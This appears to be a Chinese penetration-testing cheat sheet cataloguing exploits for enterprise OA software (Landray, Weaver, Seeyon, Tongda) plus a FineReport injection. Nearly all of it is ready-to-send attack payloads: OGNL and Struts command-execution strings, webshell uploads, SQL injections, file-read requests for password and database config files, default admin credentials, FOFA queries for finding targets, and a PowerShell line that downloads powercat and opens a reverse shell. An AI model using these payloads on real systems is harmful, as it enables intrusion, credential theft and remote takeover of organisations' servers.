POST /WebReport/ReportServer?op=fr_log&cmd=fg_errinfo&fr_username=admin HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Connection: close Content-Length: 675 __parameters__={"LABEL1":"TYPE:","TYPE":"6;CREATE ALIAS RUMCMD FOR \"com.fr.chart.phantom.system.SystemServiceUtils.exeCmd\";CALL RUMCMD('curl http://xxxx.dnslog.cn');select msg, trace, sinfo, logtime from fr_errrecord where 1=1","LABEL3":"START_TIME:","START_TIME":"2020-08-11 00:00","LABEL5":"END_TIME:","END_TIME":"2020-08-11 16:41","LABEL7":"LIMIT:","LIMIT":2}
OA
本类包含 OA、ERP、CRM 等
蓝凌
FOFA: app="Landray-OA系统"
相关工具
蓝凌OA custom.jsp 任意文件读取漏洞
-
相关文章
-
POC | Payload | exp
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 Content-Length: 42 Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip var={"body":{"file":"file:///etc/passwd"}}
蓝凌 OA SSRF+JNDI 远程命令执行
- POC | Payload | exp
配合文件读漏洞 读取 /WEB-INF/KmssConfig/admin.properties 获取password后,使用 DES方法 解密,默认密钥为 kmssAdminKey 访问后台地址使用解密的密码登录 http://xxx.xxx.xxx.xxx/admin.do 使用JNDI-Injection-Exploit 执行 getshell
CNVD-2021-01363-蓝凌 OA-EKP 后台 SQL 注入漏洞
-
描述
ordeby 参数存在注入
-
POC | Payload | exp
/km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true
蓝凌 OA xmldecoder 反序列化
-
相关文章
-
POC | Payload | exp
/sys/search/sys_search_main/sysSearchMain.do?method=editParam&fdParemNames=11&FdParameters=[shellcode]
蓝凌 OA treexml.tmpl script 远程代码执行漏洞
- POC | Payload | exp
泛微
相关文章
相关工具
敏感文件泄露
/messager/users.data
/plugin/ewe/jsp/config.jsp
路径遍历
/plugin/ewe/admin/upload.jsp?id=11&dir=../../../
/weaver/weaver.file.SignatureDownLoad?markId=1+union+select+'../ecology/WEB-INF/prop/weaver.properties'
e-mobile
fofa: app="泛微-EMobile"
E-mobile
admin/admin111
E-Mobile 4.5 RCE
**.**.**.**/verifyLogin.do
data:loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${@**.**.**.**.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ipconfig').getInputStream())}
http://**.**.**.**/verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**:89/verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
**.**.**.**/verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**/verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
http://**.**.**.**/verifyLogin.do
data: loginid=CasterJs&password=CasterJs&clienttype=Webclient&clientver=4.5&language=&country=&verify=${6666-2333}
CNVD-2017-03561 e-mobile < 6.5 Ognl 表达式注入
-
影响版本
- v6.5
- v5.5
-
相关文章
-
POC | Payload | exp
/login.do?message=${} /manager/login.do?message=${} message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami
CNVD-2017-07285 S2-046
- POC | Payload | exp
filename="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
CNVD-2021-25287 SQLi to RCE
-
影响版本
- v6.6
-
相关文章
-
POC | Payload | exp
/messageType.do /client.do CREATE ALIAS EXEC AS $$ void e(String cmd) throws java.io.IOException {java.lang.Runtime rt= java.lang.Runtime.getRuntime();rt.exec(cmd);}$$ CALL EXEC('whoami');
e-cology
fofa: app="Weaver-OA"
fofa: app="泛微-协同办公 OA"
指纹
Set-Cookie: ecology_JSessionId=
ecology
OA 默认口令
sysadmin/1
/services/MobileService?wsdl 注入
泛微OA sysinterface/codeEdit.jsp 页面任意文件上传 WooYun-2015-0155705
-
相关文章
-
POC | Payload | exp
/sysinterface/codeEdit.jsp
e-cology OA Beanshell 组件远程代码执行
-
相关文章
-
POC | Payload | exp
/weaver/bsh.servlet.BshServlet
eval%00("ex"%2b"ec(\"whoami\")"); 也可以换成 ex\u0065c("cmd /c dir");
泛微多数都是 windows 环境, 反弹 shell 可以使用 pcat
powershell IEX(New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c ip -p 6666 -e cmd
ecology8_mobile_sql_inject
- POC | Payload | exp
泛微 OA WorkflowCenterTreeData 接口注入漏洞(限 oracle 数据库)
- POC | Payload | exp
泛微 ecology OA 系统接口存在数据库配置信息泄露漏洞
-
相关文章
-
POC | Payload | exp
泛微OA V8 SQL注入漏洞
-
描述
泛微 OA V8 存在 SQL 注入漏洞,攻击者可以通过漏洞获取管理员权限和服务器权限
-
POC | Payload | exp
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
泛微OA V9前台上传漏洞
-
描述
泛微 OA V9 存在文件上传接口导致任意文件上传, 漏洞位于: /page/exportImport/uploadOperation.jsp 文件中
-
POC | Payload | exp
POST /page/exportImport/uploadOperation.jsp HTTP/1.1 Host: x.x.x.x Content-Length: 216 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://x.x.x.x/ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFy3iNVBftjP6IOwo Connection: close ------WebKitFormBoundaryFy3iNVBftjP6IOwo Content-Disposition: form-data; name="file"; filename="12.jsp" Content-Type: application/octet-stream <%out.print(1111);%> ------WebKitFormBoundaryFy3iNVBftjP6IOwo--
page/exportImport/fileTransfer/12.jsp
泛微OA V9 E-Cology WorkflowServiceXml RCE
-
描述
泛微 E-cology OA 系统的 WorkflowServiceXml 接口可被未授权访问,攻击者调用该接口,可构造特定的 HTTP 请求绕过泛微本身一些安全限制从而达成远程代码执行
-
相关文章
泛微OA weaver.common.Ctrl 任意文件上传漏洞
-
描述
泛微 OA weaver.common.Ctrl 存在任意文件上传漏洞,攻击者通过漏洞可以上传 webshell 文件控制服务器
-
相关文章
com.weaver.formmodel.apps.ktree.servlet.KtreeUploadAction 任意文件上传
weaver.workflow.exceldesign.ExcelUploadServlet 任意文件上传
/workrelate/plan/util/uploaderOperate.jsp + /OfficeServer 文件上传
- POC | Payload | exp
管理员任意登录
- POC | Payload | exp
/mobile/plugin/VerifyQuickLogin.jsp identifier=1&language=1&ipaddress=
e-bridge
fofa: app="泛微-云桥 e-Bridge"
泛微云桥 /wxjsapi/saveYZJFile 任意文件读取
-
描述
未授权任意文件读取,/wxjsapi/saveYZJFile 接口获取 filepath,返回数据包内出现了程序的绝对路径,攻击者可以通过返回内容识别程序运行路径从而下载数据库配置文件危害可见。
-
相关文章
-
POC | Payload | exp
downloadUrl 参数修改成需要获取文件的绝对路径,记录返回包中的 id 值 /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c:windows/win.ini&fileExt=txt
通过查看文件接口访问 /file/fileNoLogin/id
/file/fileNoLogin/xxxxxxxxxxxxxxxxx
参考安识科技 A-Team 利用方法,https://mp.weixin.qq.com/s/Y_2_e7HIWH3z5jhMsK7pZA
参数不填写绝对路径写进文本内容就是当前的目录,产生了一个新的漏洞 “目录遍历” /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///D:/&fileExt=txt 常见路径 d://ebridge//tomcat//webapps//ROOT//WEB-INF//classes//init.properties d:/OA/tomcat8/webapps/OAMS/WEB-INF/classes/dbconfig.properties 泛微OA数据库
e-office
fofa: app="泛微-EOffice"
指纹
/general/login/index.php
相关文章
CNVD-2021-49104 E-Office v9 任意文件上传漏洞
-
相关文章
-
POC | Payload | exp
E-office do_excel.php任意文件写入漏洞
- POC | Payload | exp
/WWW/general/charge/charge_list/do_excel.php html=<?php system($_POST[pass]);?>
eoffice10 前台 getshell
-
POC | Payload | exp
查看版本 /eoffice10/version.json
<form method='post' action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/OfficeServer.php' enctype="multipart/form-data" > <input type="file" name="FileData"/></br></br> <input type="text" name="FormData" value="1"/></br></br> <button type=submit value="上传">上传</button> </form>
POST /eoffice10/server/public/iWebOffice2015/OfficeServer.php HTTP/1.1 Host: XXXXXXXX:8010 Content-Length: 378 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: null Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJjb5ZAJOOXO7fwjs User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/ *;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 Connection: close ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; name="FileData"; filename="1.jpg" Content-Type: image/jpeg <?php echo md5(1);?> ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs Content-Disposition: form-data; name="FormData" {'USERNAME':'','RECORDID':'undefined','OPTION':'SAVEFILE','FILENAME':'test.php'} ------WebKitFormBoundaryJjb5ZAJOOXO7fwjs--
http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015/Document/test.php
任意文件上传
- POC | Payload | exp
/E-mobile/App/Ajax/ajax.php?action=mobile_upload_save 后缀 xxx.php. /attachment/xxxxx.php
全回显SSRF可RCE
- POC | Payload | exp
/E-mobile/App/Ajax/ajax.php?action=dingtalkImg&result[]=http://x.x.x.x/1.php /attachment/xxxxx.php
回显SSRF
- POC | Payload | exp
/E-mobile/App/System/File/downfile.php?url= Host: www.baidu.com
致远
Fofa : app="致远互联-OA"
相关文章
相关工具
致远OA数据库配置文件
/opt/Seeyon/A8/base/conf/datasourceCtp.properties
指纹
/seeyon/htmlofficeservlet
/seeyon/index.jsp
seeyon
默认口令
system/system
group-admin/123456
admin1/123456
gov-admin/123456
audit-admin/123456
致远OA Session泄漏漏洞
需登录账户,注入发生在search_result.jsp文件中的docTitle参数
- POC | Payload | exp
/yyoa/ext/https/getSessionList.jsp?cmd=getAll
致远OA A6 search_result.jsp sql注入漏洞
- POC | Payload | exp
/yyoa/oaSearch/search_result.jsp?docType=协同信息&docTitle=1'and/**/1=2/**/ union/**/all/**/select/**/user(),2,3,4,5%23&goal=1&perId=0&startTime=&endTime=&keyword=&searchArea=notArc
致远OA A6 setextno.jsp sql注入漏洞
- POC | Payload | exp
/yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17) union all select 1,2,@@version,user()%23
致远OA A6 重置数据库账号密码漏洞
- POC | Payload | exp
/yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp?user_ids=(17) union all select user()%23{'success':false,'errors':'root@localhost'}
致远OA A6 敏感信息泄露
- POC | Payload | exp
/yyoa/createMysql.jsp /yyoa/ext/createMysql.jsp /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0
致远 OA A6 test.jsp sql 注入漏洞
-
相关文章
-
POC | Payload | exp
/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20database()) /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20@@basedir)
致远OA A8 未授权访问
- POC | Payload | exp
/seeyon/main.do?method=officeDown&filename=c:/boot.ini
致远OA A8 任意用户密码修改漏洞
-
相关文章
-
POC | Payload | exp
/seeyon/services/authorityService?wsdl
致远OA A8-m 后台万能密码
- POC | Payload | exp
www.test.com/seeyon/management/status.jsp WLCCYBD@SEEYON
致远OA A8-v5 无视验证码撞库
-
描述
致远 A8-V5 在设计时存在逻辑错误,用户修改密码时对原密码进行了验证,但是验证使用的服务存在未授权访问漏洞,系统对非合法请求的原密码验证功能进行回应,导致了无视验证码,无需 login 页面进行密码尝试
-
POC | Payload | exp
GET /seeyon/getAjaxDataServlet?S=ajaxOrgManager&M=isOldPasswordCorrect&CL=true&RVT=XML&P_1_String=admin&P_2_String=wy123456 HTTP/1.0 Accept: */* Accept-Language: zh-cn Referer: http://www.test.com/seeyon/individualManager.do?method=managerFrame requesttype: AJAX Content-Type: application/x-www-form-urlencoded Cookie: User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: www.test.com DNT: 1 Proxy-Connection: Keep-Alive
致远OA A8-v5 任意用户密码修改
-
描述
致远 A8-V5 在设计时存在逻辑错误,在上一步对原始密码进行验证后,下一步不再检测原始密码,从而直接修改用户密码,导致平行权限的越权漏洞。
-
POC | Payload | exp
POST /seeyon/individualManager.do?method=modifyIndividual HTTP/1.0 Accept: text/html, application/xhtml+xml, */* Referer: http://www.test.com/seeyon/individualManager.do?method=managerFrame Accept-Language: zh-CN User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Proxy-Connection: Keep-Alive Pragma: no-cache Content-Length: 86 DNT: 1 Host: www.test.com Cookie: JSESSIONID=DA71A65B3AAD45823A1FADAB80A3E685; Hm_lvt_49c0fa7f96aa0a5fb95c62909d5190a6=1419221849,1419232608; avatarImageUrl=8469117046183055270; loginPageURL="/main.do" individualName=admin&formerpassword=123456&nowpassword=wy123456&validatepass=wy123456
individualName为用户名
注意,此处需要以一个合法的JSESSIONID发送如上数据即可修改任意用户密码,合法的JSESSIONID由撞库得出。
致远OA帆软报表组件反射型XSS&SSRF
致远 OA 帆软报表组件前台 XXE 漏洞
A8-OA-seeyon-RCE
-
相关文章
-
POC | Payload | exp
CNVD-2020-62422 webmail.do任意文件下载
-
影响版本
- 致远OA A6-V5
- 致远OA A8-V5
- 致远OA G6
-
POC | Payload | exp
http://xxx.xxx.xxx.xxx/seeyon/webmail.do?method=doDownloadAtt&filename=a.txt&filePath=../conf/datasourceCtp.properties
致远OA任意管理员登陆
- 相关文章
CNVD-2021-01627 && 致远 OA ajax.do 登录绕过任意文件上传
-
相关文章
-
POC | Payload | exp
POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1 Host: 127.0.0.1 Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: JSESSIONID=7B6D8C106BD599DB0EF2F2E3B794A4FA; loginPageURL=; login_locale=zh_CN; Content-Type: application/x-www-form-urlencoded Content-Length: 8819 managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTK%C2%93%C2%A2H%10%3E%C3%AF%C3%BE%0A%C3%82%C2%8Bv%C3%B4%C2%8C%C2%8D+c%C2%BB%13%7Bh_%C2%88%28*%28%C2%AF%C2%8D%3D%40%15Ba%15%C2%B0%C3%B2%10%C3%AC%C2%98%C3%BF%C2%BE%05%C3%98%C3%93%3D%C2%B1%C2%BDu%C2%A9%C3%8C%C2%AC%C3%8C%C2%AF%C3%B2%C3%BD%C3%97k%C3%B7%14_H%C2%8E%C2%9DC%C2%95x%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%A4%C2%96t3%2F%C3%8D%C2%BA%C3%AF%C3%A2y%C2%99%5C%C2%BC4EqT%3Fj%C3%99%05E%3E%C2%938Y%C3%80%C3%BC%C3%89t%C3%BA%C3%BD%C2%A7%C2%AB%C3%A7%3AI%C2%92%3E%C2%A5%C2%9EW%C3%85%C3%91S%C3%A7%C3%BB%C3%AFL%7B%7E%0B%C2%9D%C3%82%C3%A9%C2%A3%C2%B8%C2%BF%C2%A3%26%C2%99qA%C2%99wa%C2%92w%C2%9A%C2%A3%00%C2%91we%3EQ%C3%AB%C3%95%C3%B8%C2%8F%1D%C2%AD%C2%81%3C%26%C3%90%C3%89%C2%BCA%3FL%C2%93%C2%B2%C3%B3%C3%B0%13%C2%9E%C2%B9%C2%BB%C2%92%06%1E%C3%86%C2%B5%2F%3B1%C2%B9%C2%81YR%C2%B9%C3%9C%C2%98%C2%95%C2%96A%C3%A6%C2%8A%C3%82mKj%19%C2%8B%C2%9C%C2%A5%C3%8A%C2%82Y%5C%C2%AC%C2%B9%24%C2%80d%C2%9E%03%5E%C3%8F%C3%97D%29%5Cm%2C%1F%07%2F%C3%85Q%5CD%C2%B6%26%C3%B9%C2%90%C3%A8%15%C3%A0p%C3%A1%C2%86%2C%C3%9Ah%C3%83J%0A%C2%87%C3%8FN%C2%A4%5C%C2%B7DM%00%C3%91C%28b%C3%8E%C3%96%C2%84%C2%ABe%40%2C%C2%898%03%C3%A2%C2%B8%C2%825%3EYp%C2%96%26%0C%C3%A8%7B%C2%BAFq%C3%9A%C3%B0%C2%A6%C2%9F%5B%C3%BCJ%00K%C2%B5%C3%B8TFqmc%C2%93%C3%8BH*va%C3%B9%0F%C3%A0_%C2%BE%C3%99%C2%A2%1E%C2%BA%C3%A2%C2%A2%C2%B2L5q%C2%B9%C3%A1%C2%A3%24*%C2%A9e*7iq%C3%B4m3%60mC8%C2%83j2%C2%A3%3A7%C3%80%C2%96%C2%85e%C2%A8%18D%C2%99.%C3%8F%5B%C2%BD%C2%838%0E%28F%25%C2%89%C2%9B%C3%84%C3%A3%C2%95%01%C2%A0%C2%B4L%C3%A9-%3F%C2%B8Bc%C2%95%3A%C3%86%C3%86%C3%9Fse%00%C3%B8%C2%8DoW%01%C3%B2L%15K%C2%8B%0CZ%08%C2%8Fh%7C%2C4W%C2%B9%C2%B4l%C3%AD%C3%96D%C3%856%C3%81%C2%B9%7Dl%C2%B1eQJ7%C3%93%12%C2%ADI%C2%89%5D%02Ygz%1E%C2%9DL%C3%B6%C2%99%C3%A6%C2%B4%C3%8E%C3%BB%C3%996j%C2%BDU%40s%40%C3%B3w%C3%8F%5B%C2%A4%C2%84%C2%80%C3%A0%2B%14K%0Cg%C3%82%01.W%C2%89K%C2%80%C3%AF%C3%9CXd%1F%C3%B6%03%C3%BB%C2%B0%C2%A9%C2%B6%C2%86%C2%8D%C2%ADP%3Fo%0F%C3%92%C3%80B%C3%92%08p%C3%BA%C2%AD%C2%A9%01%12%C2%AE%C3%90T%0D%C3%8B%28%07%C2%B6%C3%A6%23%C2%A8I%C2%A9S%C2%9DG%7B%0E_%C2%9D6%C3%86%C3%B1%1B%C2%BD%26%10%C3%839%C2%A6uU%03%C2%97%28X%C2%9E%C2%AE%26%C2%AA%C2%BEA%C3%B2%21%0B%C3%974%06%C3%87%C3%9C%C3%87%1BT%C3%A6%C2%B6%09%C3%BC%23%C2%A7%C2%87u%C2%AC%1A%C2%A7%0BG%7E%C2%82%C2%AD%C3%8A%C2%8F%3F%C3%BC%19%C3%99%C2%BF%C3%BE%C2%99%C3%88%C2%95%C2%84d%C2%AD%C2%91O%C3%AB%7C%C2%81%C3%8AO%C3%96o%C3%B8%C3%9Ay%C3%A4%12%C2%9D%C2%A7%C3%B5%C2%89%C2%A1%18%24%C2%A0j%C3%B4%C3%9A%C3%BA%C3%94z%C2%8D_%C2%BF%C3%96F%C2%9E%C2%9E%C2%A9%1C%C3%84V%25%C2%9C%5D%C3%96%C2%A6%C3%B9X%C2%A4%C2%B2%28%60XMn%C3%90%18%C3%A6%C2%AE%C2%81o%C3%B4m%C2%BA%C3%97%C2%95%C2%85%12%C2%AAs%C2%9A%C3%97%C3%A2n%C2%977%C3%BD%C3%81%C2%A9x%1F%C3%A9%C3%84%C2%A6%C2%BD*%2FW%18%C2%98%3A%06%C3%BC%3E%C2%B79%C2%9D%3D%12%C3%BD%C3%AD%C2%8F%1C%C3%944%C2%9D%5E%C2%97%1Cc%C3%AAgBc%C2%A0%C3%B1%C3%83%C2%95%1B%29%C2%ACe%08%21%C2%8D%C2%8F%C3%BA%C2%A1%C2%97%C3%90X%C2%A4%C2%A0%0A%C2%9A%C2%9E%C3%9Es%C3%A3%1C%C2%8A%C3%BA%10%C3%92%C3%9A%C3%AE%C2%A6%C3%A3%C2%A6%27%01%C2%A7T%C2%8E9a%5DQgw%C3%A1%C2%B5h%C3%AB%C2%BA*%5C%7E%C3%BF%C3%B8%3E%C3%ADL%C2%9AG%7D%C2%82R%C3%90%C2%9F%C2%BCh%C3%B3o%C3%83%C2%99%07bH%07%1E%C3%9E%C3%AFv%C3%96%3FW%C3%AA%C3%BDw%C2%AA%5B%C2%B3%3B%C3%93%C3%9A%C2%B6L%C3%AF%0E%C3%98o%C3%AFI%7E%3AQ%C2%80f%09%3C%7C%C3%A9%1C%0F%C2%8B%C2%AF%C3%8F%1F%C2%97%C3%84%C3%87%7D%C3%93o%18%1C%C3%B5%3E%C2%82%C3%BF%C2%9F.%C3%80q%C3%AAQ%C3%87%7E%7C%C2%AF%C3%B7%21%25%C2%A0wb%C3%92%C3%8C%C3%89%10%60%C3%8A%C2%B2%C3%AC%3D%C2%BCv%7F%C3%90%25I%17%C3%A5k%7Dg%C2%97%C3%9C%C3%AB%C3%BE%C3%BD%2FheA%C3%A4_%05%00%00 Webshell地址:https://xxxxx/seeyon/SeeyonUpdate1.jspx 冰蝎3 默认马pass:rebeyond
A5-V8 致远OA任意文件下载漏洞
- 相关文章
致远OA fastjson远程代码执行漏洞
通达
官网 : https://www.tongda2000.com/
fofa: app="TDXK-通达OA"
指纹
tongda.ico
Office Anywhere 20xx版 网络智能办公系统
/ispirit/interface/gateway.php
/mac/gateway.php
相关文章
相关工具
- xinyu2428/TDOA_RCE - 通达OA综合利用工具
- kitezzzGrim/tongda-exp - python编写的多个通达常见漏洞exp
通达oa 2007 sql注入漏洞
- POC | Payload | exp
/general/document/index.php/setting/keywords/index _SERVER[QUERY_STRING]=kname=1%2Band@``%2Bor%2Bif(substr(user(),1,4)=root,1,exp(710))#
通达oa 2011-2013 GETSHELL
- POC | Payload | exp
/general/crm/studio/modules/EntityRelease/release.php?entity_name=1%d5'%20or%20sys_function.FUNC_ID=1%23%20${%20fputs(fopen(base64_decode(c2hlbGwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))} /general/email/index.php /general/email/shell.php 密码C
2013、2015版本 文件包含
-
POC | Payload | exp
www.test.com/inc/menu_left.php?GLOBALS[MENU_LEFT][A][module][1]=a&include_file=../inc/js/menu_left.js
头像常见路径:
\MYOA\webroot\attachment\avatar\XXX.jpg
2013、2015版本 SQL 注入
- POC | Payload | exp
www.test.com/general/mytable/intel_view/workflow.php?MAX_COUNT=15 procedure analyse(extractvalue(rand(),concat(0x3a,database())),1)&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&MODULE_ID=Math.random
POST /general/document/index.php/recv/register/turn HTTP/1.1 _SERVER=&rid=1' _SERVER=&rid=exp(if((1=1),1,710))
POST /general/document/index.php/recv/register/insert HTTP/1.1 title)values("'"^exp(if(1%3d2,1,710)))#=1&_SERVER=
2013、2015版本 未授权访问
- POC | Payload | exp
www.test.com/mobile/inc/get_contactlist.php?P=1&KWORD=%&isuser_info=3 www.test.com/mobile/user_info/data.php?P=1&ATYPE=getUserInfo&Q_ID=50
2013、2015版本 敏感信息泄露
- POC | Payload | exp
www.test.com/general/get_userinfo.php www.test.com/general/ipanel/user/query.php www.test.com/general/info/dept/
2013、2015版本 XSS
-
POC | Payload | exp
发送邮件、问题问答存在 XSS
<img src=x onerror=alert(1)>
2013、2015版本 越权
-
POC | Payload | exp
www.test.com/interface/ugo.php?OA_USER=admin
www.test.com/general/system/database/ GET 转为 POST 加上参数 _SERVER=
2013、2015版本 任意⽂件上传漏洞
-
POC | Payload | exp
<form enctype="multipart/form-data" action="http://www.test.com/general/vmeet/wbUpload.php?fileName=test.php+" method="post"> <input type="file" name="Filedata" size="50"><br> <input type="submit" value="Upload"> </form>
shell地址为 : www.test.com/general/vmeet/wbUpload/test.php
通达OA 11.2 后台getshell
系统管理-附件管理-添加存储目录
设置存储目录 (一般默认网站安装目录为 D:/MYOA/webroot/ 最后也有路径获取的地方,如果不设置会不在网站根目录下,无法直接访问附件)
寻找附件上传
通过.php. 绕过黑名单上传
根据返回结果拼接上传路径:/im/1912/383971046.test.php 直接访问(im是模块)
通达 OA 任意用户登录漏洞
-
影响版本
- 通达 OA 2017
- 通达 OA V11.X--V11.5
-
相关文章
-
POC | Payload | exp
第一种利用方法 1. 拿到 uid /general/login_code.php /ispirit/login_code.php 2. 拿 cookie POST /logincheck_code.php codeuid={9E908086-342B-2A87-B0E9-E573E226302A}&uid=1 3. 访问验证 /general/index.php?is_modify_pwd=1 第二种利用方法 1. 首先访问 /ispirit/login_code.php 获取 codeuid。 /ispirit/login_code.php 2. 访问 /general/login_code_scan.php 提交 post 参数,拿到cookie POST /general/logincheck_code.php codeuid={9E908086-342B-2A87-B0E9-E573E226302A}&source=pc&uid=1&type=confirm&username=admin 3. 访问 /ispirit/login_code_check.php?codeuid=xxx /ispirit/login_code_check.php?codeuid={9E908086-342B-2A87-B0E9-E573E226302A} 3. 访问验证 /general/index.php?is_modify_pwd=1
通达oa 11.5 sql注入漏洞
-
POC | Payload | exp
POST /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 Referer: https://www.0-sec.org/portal/home/ Cookie: PHPSESSID=54j5v894kbrm5sitdvv8nk4520; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=c9e143ff Connection: keep-alive Host: www.0-sec.org Pragma: no-cache X-Requested-With: XMLHttpRequest Content-Length: 154 X-WVS-ID: Acunetix-Autologin/65535 Cache-Control: no-cache Accept: */* Origin: https://www.0-sec.org Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 starttime=AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])---&endtime=1598918400&view=month&condition=1
/general/email/sentbox/get_index_data.php?asc=0&boxid=&boxname=sentbox&curnum=3&emailtype=ALLMAIL&keyword=sample%40email.tst&orderby=1&pagelimit=20&tag=×tamp=1598069133&total=
/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3--&pagelimit=10&tag=×tamp=1598069103&total= /general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=1+RLIKE+(SELECT+(CASE+WHEN(substr(user(),1,1)=0x72)+THEN+1+ELSE+0x28+END))&asc=0&keyword=&emailtype=ALLMAIL&boxname=inbox&tag=
/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2
POST /general/file_folder/swfupload_new.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36 Referer: http://192.168.202.1/ Connection: close Host: 192.168.202.1 Content-Length: 391 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2 ------------GFioQpMK0vv2 Content-Disposition: form-data; name="ATTACHMENT_ID" 1 ------------GFioQpMK0vv2 Content-Disposition: form-data; name="ATTACHMENT_NAME" 1 ------------GFioQpMK0vv2 Content-Disposition: form-data; name="FILE_SORT" 2 ------------GFioQpMK0vv2 Content-Disposition: form-data; name="SORT_ID" ------------GFioQpMK0vv2--
